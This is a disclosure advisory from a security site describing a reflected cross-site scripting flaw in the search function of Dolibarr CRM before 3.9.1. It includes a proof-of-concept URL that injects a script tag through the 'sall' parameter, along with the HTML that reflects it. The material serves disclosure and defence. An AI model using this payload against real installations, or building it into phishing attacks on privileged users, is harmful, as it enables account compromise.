Dolibarr CRM Cross Site Scripting

2016.06.22
Credit: David Silveiro
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability # Exploit Author: David Silveiro # Exploit Author Github: github.com/davidsilveiro # Exploit Author Twitter: twitter.com/david_silveiro # Vendor Homepage: https://www.dolibarr.org # Software Link: https://sourceforge.net/projects/dolibarr/files/ # Date: Zero Day Dolibarr ERP is a modern CRM to manage your company.It's opensource software, designed for small and medium companies, foundations and freelancers. The issue lyes with insufficient sanitization when a user makes use of the search function provided, and thus able to inject malicious JS to be used inhand with a phishing attack direct towards higher previliged user. POC: http://127.0.0.1/societe/list.php?sall=<script>alert()<%2Fscript> <form name="formfilter" action="/societe/list.php" method="post"> <input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input> <input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input> <input type="hidden" value="s.nom" name="sortfield"></input> <input type="hidden" value="ASC" name="sortorder"></input> Search criteria ' <strong> <script> alert() <------- </script> </strong> ' into fields Third party name, Alias name, Custom? <table class="liste "></table> </form>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top